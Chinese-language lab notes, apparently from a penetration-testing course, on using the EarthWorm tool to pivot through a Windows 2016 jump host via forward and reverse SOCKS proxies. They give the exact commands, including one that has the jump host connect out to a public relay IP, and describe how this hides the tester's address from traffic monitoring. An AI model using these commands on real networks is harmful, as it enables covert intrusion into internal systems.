一、EarthWorm的使用
内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发、端口映射三大功能。相较于其他穿透工具,如reGeorg等,EarthWorm可以穿透更复杂的内网环境同时也不需要跳板机运行web服务,也可以支持多平台间的转接通讯,如Linux、Windows、MacOS、Arm-linux等。
下载地址:https://gitee.com/aveng/EarthWorm/tree/master/download和https://github.com/mrawb/ew/blob/master/ew_for_linux64,本工具目前已经不再更新,被封杀
1、正向代理
将EarthWorm在Windows2016上运行
ew_for_win_32.exe -s ssocksd -l 1080
-s:指定我们的代理的进程的名字
-l:指定我们端口号,1080是socks的默认端口
这是一个独立的工具,和msf没有任何的关系,没有kali那边的msf给这边的木马下达指令,只需要在跳板机上把这个代理设置好了就行
看看192.168.209.129可不可以访问,答案是不可以
然后我们要做的事情就是给这个浏览器配置一个代理
这时候的代理服务器就不是本地了,而是Windows2016这台跳板机的了
然后在再去访问,发现访问成功
2、反弹代理
由于我没有公网服务器,所以就用老师的电脑来进行实验
首先我们得先有一个公网服务器,然后进入到我们的公网
这是我们公网服务器的终端,然后进入到EarthWorm的目录底下
在公网上启动一个服务端
./ew_for_linux64 -s rcsocks -l 8080 -e 8086 #确保8080和8086均是开放端口
8080是代理端口,8086是通信端口
然后执行
这是我们公网服务器中安全组开启的端口
接下来我们在windows2016跳板机上运行以下命令
ew_for_win_32.exe -s rssocks -d 47.96.116.171 -e 8086 建立与8086之间的通信,通信的目的是为了存储数据
指定公网的IP地址和通信端口
然后执行
然后我们可以在公网服务器这儿看到没有报错,连接正常
接下来该如何做呢
再开一个终端看看端口情况,发现开了8080和8086端口
然后在Kali的浏览器上配置代理为公网IP的808端口
然后我们再去访问目标主机的phpinfo,相当于跳了两跳,从公网服务器跳到Windows2016这个跳板机上,然后再跳到windows7上
从windows7这个地方来监听流量看到的只是windows2016在访问
从windows2016这边看看能不能发现我们所在位置的IP
我们可以使用wireshark去监听流量,因为widows2016在和我们的公网进行通信,只能发现windows2016和公网之间的通信,没办法追踪我们所在位置的IP